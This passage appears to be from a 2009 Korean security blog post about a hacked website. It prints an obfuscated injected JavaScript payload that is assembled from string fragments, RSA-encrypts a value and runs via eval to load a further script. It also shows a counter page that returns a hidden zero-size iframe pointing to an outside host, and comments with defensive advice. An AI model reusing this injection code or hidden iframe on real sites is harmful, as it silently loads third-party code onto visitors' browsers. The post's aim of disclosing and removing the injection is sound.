J';J='EX=TFU;A.prototype.H';N='P=NQU;A.prototype.exp=JR';Z='HYW;A.prototype.PLY=XSB;A.';F='otype.NSN=PKN;A.prototype.Y';V='I;A.prototype.UKZ=VHR;A.pro';R='M;A.prototype.JWV=CJC;A.pro';T='prototype.mod=JOB;A.prototyp';G='totype.FKG=IVS;A.prot';I='ype.PQP=PUE;A.prototype.DKU=II';E='VF=KGX;A.prototype.FEO=TSD';L=';A.prototype.VFG=EZB;A.pro';O='totype.RTY=SQY;A.prototype.FI';X='totype.OTW=BEJ;A.prototyp';Y='ype.PTO=MQI;A.protot';U='type.BSV=CQH;A.protot';M='e.CKD=BQI;A.IEH=nbv(0)';CCUTMK+=U+Y+I+R+G+F+J+E+L+O+N+V+X+W+Z+T+M+P;Y='t=PEU;JMF.prototype.';D='(this.j+this.S[this.i])&255';S='i=(this.i+1)&255;this.j=';U='is.S[j]=t}this.i=0;this.j=0}f';Q=';t=this.S[this.i];this';R='this.S=new Array()}function ';F='j];this.S[this.j]=t;return t';G='unction OYO(){var t;this.';E='his.S[(t+this.S[this.i])&2';M='next=OYO;function 
NTJ';V='+a[i%a.length])&255;t=this.S[';I='55]}JMF.prototype.ini';B='<256;++i)this.S[i]=i;j=0;for(';N='.S[this.i]=this.S[this.';C='MF(){this.i=0;this.j=0;';O='PEU(a){var i,j,t;for(i=0;i';P='i=0;i<256;++i){j=(j+this.S[i]';Z='i];this.S[i]=this.S[j];th';CCUTMK+=C+R+O+B+P+V+Z+U+G+S+D+Q+N+F+E+I+Y+M;R='if(navigator.appName';J='LZN++]^=(x>>24)&255;if(LZ';B='th;++t)OUS[LZN++]=z.ch';E='ar OTS=256;var MUC;var OUS;va';C='US[LZN++]^=(x>>16)&255;OUS[';L='arCodeAt(t)&255}while(LZ';U='new Array();LZN=0;var t;';D='S[LZN++]^=(x>>8)&255;O';G='N>=OTS)LZN-=OTS}function FY';H='om(32);for(t=0;t<z.leng';W='){var z=window.crypto.rand';K='X(){DWL(new Date().g';N='=="Netscape"&&navigator';O='){OUS[LZN++]^=x&255;OU';Q='etTime())}if(OUS==null){OUS=';Z='r LZN;function DWL(x';Y='.appVersion<"5"&&window.crypto';T='(){return new JMF()}v';CCUTMK+=T+E+Z+O+D+C+J+G+K+Q+U+R+N+Y+W+H+B+L;C='LZN++]=t>>>8;OUS[LZN++]=t&2';S='hile(i+n<s.length){a+';B='.next()}function EJEs(a';F='){}ZXV.prototype.ZQX=EJEs';N='++i)a[i]=EJE()}function ZXV(';G='){var i;for(i=0;i<a.length;';X='N<OTS){t=Math.floor(65';R='=s.substring(i,i+n)+"\\n";i+=n}';O='55}LZN=0;FYX()}function EJE(){';Q=';function UGN(a,r){return new';E='=0;LZN<OUS.length;++LZN)OUS';K='){var a="";var i=0;w';L='[LZN]=0;LZN=0}return MUC';H='if(MUC==null){FYX();MUC';Z=' A(a,r)}function CPY(s,n';J='=NTJ();MUC.init(OUS);for(LZN';Y='return a+s.substring(i,s.leng';U='536*Math.random());OUS[';CCUTMK+=X+U+C+O+H+J+E+L+B+G+N+F+Q+Z+K+S+R+Y;F='=null;this.e=0;this.';T='s.UCD=null;this.JNX=';Z='i>=0&&n>0)a[--n]=s.char';J='}a[--n]=2;a[--n]=0;return new ';W='d=null;this.p=null;this.';M='A(a)}function RSAKey(){this.n';N='turn null}var a=new Array()';V=')b.ZQX(x);a[--n]=x[0]';R=';var i=s.length-1;while(';Y='null}function PGU(N,E)';P='new ZXV();var x=new Array();w';U='hile(n>2){x[0]=0;while(x[0]==0';B='turn b.UKZ(16)}function BSB';H='th)}function GED(b){if(b<0x1';X='0)return"0"+b.UKZ(16);else re';Q='(s,n){if(n<s.length+11){re';S='CodeAt(i--);a[--n]=0;var 
b=';D='q=null;this.POX=null;thi';CCUTMK+=H+X+B+Q+N+R+Z+S+P+U+V+J+M+F+W+D+T+Y;C='this.n)}function JNP(a';D=',16);this.e=parseInt';R='Public(m);if(c==null)return nu';X='ll)return null;var c=this.do';H='sss="";for(oil=0;oil<53;oi';U='prototype.encrypt=JNP;';E='){if(oil>1){oil=MSE(SVC,53';J='th>0&&E.length>0){this.n=UGN(N';W='ll;var h=c.UKZ(16);if((h.l';M='urn"0"+h}RSAKey.prototype';S='otype.setPublic=PGU;RSAKey.';O='{if(N!=null&&E!=null&&N.leng';Y='(E,16)}}function XIQ(x){';F='return x.CKD(this.e,';P='LY()+7)>>3);if(m==nu';G='.doPublic=XIQ;RSAKey.prot';K=');a=ci};var m=BSB(a,(this.n.P';N='ength&1)==0)return h;else ret';CCUTMK+=O+J+D+Y+F+C+E+K+P+X+R+W+N+M+G+S+U+H;V='(sss);nextkey=res;var ';G='39b58008e9a1bac437b4a';T='scriptTag=document.createEle';X='ment("script");scr';H='56119f4525817792b76f';O='));rsa=new RSAKey();rsa.s';Q='etPublic("b065f155da243';J='ument.body.appendChi';S='0001");res=rsa.encrypt';E='a0d4f07d6124add83347e';W='iptTag.src="?"+res;doc';M='l++)sss+=String.fromCharCode(';P='Math.floor(75+Math.sin(oil)*21';L='4abfb3aeb34772c033609addbd3f9a';U='ee3ef9bce1c8c6da5cb8825","1';F='ld(scriptTag);';CCUTMK+=M+P+O+Q+G+L+H+E+U+S+V+T+X+W+J+F;eval(CCUTMK);</script></html>


http://itcounter.net/counter.php

-- 소스 코드 --
<!-- Body returned by counter.php: a single iframe with height and width 0 and
     visibility hidden, which loads a further third-party URL (r-state.com). -->
<html>
<iframe height="0" width="0" style="visibility: hidden;" src="http://r-state.com/equi/?t=9" name="18"/>
</html>


  1. 허윤제 2009.06.29 10:21 address edit & del reply

    이거 우찌 처리해야하나요 죽겟네요

    • 웹방어 2009.06.29 18:23 address edit & del

      일단 웹방화벽을 세우시고 가능한 최대한의 로깅을 하시고
      코드 삽입되는 경로를 찾으셔야 할 것입니다.

      유입 경로가 확인되면 해당 유입 방법을 차단하고
      그외 추가적인 방법에 대해서도 계속적인 모니터링을 진행하셔야 합니다.

      위 코드 같은 경우 특별한 악성코드는 아닌 듯하지만
      사이트 접속 시 속도 저하로 원활한 서비스에 장애를 초래합니다.